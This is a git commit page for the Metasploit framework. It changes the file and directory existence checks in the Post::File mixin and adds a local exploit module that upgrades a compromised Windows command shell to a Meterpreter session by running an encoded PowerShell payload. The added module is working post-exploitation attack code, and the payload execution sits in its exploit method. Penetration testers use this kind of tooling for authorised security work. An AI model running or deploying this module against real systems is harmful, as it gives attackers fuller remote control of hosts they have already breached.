Land #2936 - Windows Command Shell Upgrade (Powershell)
commit
bd23fcf4b7
|
@ -41,15 +41,16 @@ module Msf::Post::File
|
|||
return stat.directory?
|
||||
else
|
||||
if session.platform =~ /win/
|
||||
# XXX
|
||||
f = cmd_exec("cmd.exe /C IF exist \"#{path}\\*\" ( echo true )")
|
||||
else
|
||||
f = session.shell_command_token("test -d '#{path}' && echo true")
|
||||
end
|
||||
|
||||
return false if f.nil? or f.empty?
|
||||
return false unless f =~ /true/
|
||||
return true
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Expand any environment variables to return the full path specified by +path+.
|
||||
|
@ -72,24 +73,19 @@ module Msf::Post::File
|
|||
return stat.file?
|
||||
else
|
||||
if session.platform =~ /win/
|
||||
out = session.shell_command_token("type \"#{path}\"").to_s.strip
|
||||
# Possible error messages when opening a file, see:
|
||||
# http://technet.microsoft.com/en-us/library/cc956687.aspx
|
||||
if out =~ /^The system cannot find the path specified/
|
||||
return false
|
||||
elsif out =~ /^The filename, directory name, or volume label syntax is incorrect/
|
||||
return false
|
||||
else
|
||||
return true
|
||||
f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
|
||||
if f =~ /true/
|
||||
f = cmd_exec("cmd.exe /C IF exist \"#{path}\\\\\" ( echo false ) ELSE ( echo true )")
|
||||
end
|
||||
else
|
||||
f = session.shell_command_token("test -f '#{path}' && echo true")
|
||||
end
|
||||
|
||||
return false if f.nil? or f.empty?
|
||||
return false unless f =~ /true/
|
||||
return true
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
alias file_exist? file?
|
||||
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::Powershell
|
||||
include Post::File
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Command Shell Upgrade (Powershell)',
|
||||
'Description' => %q{
|
||||
This module executes Powershell to upgrade a Windows Shell session
|
||||
to a full Meterpreter session.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10,
|
||||
},
|
||||
'DisclosureDate' => 'Jan 01 1999',
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'shell' ],
|
||||
'Targets' => [ [ 'Universal', {} ] ],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
end
|
||||
|
||||
def exploit
|
||||
psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
|
||||
|
||||
if file? "%WINDIR%\\System32#{psh_path}"
|
||||
print_status("Executing powershell command line...")
|
||||
cmd_exec(cmd_psh_payload(payload.encoded))
|
||||
else
|
||||
fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
Loading…
Reference in New Issue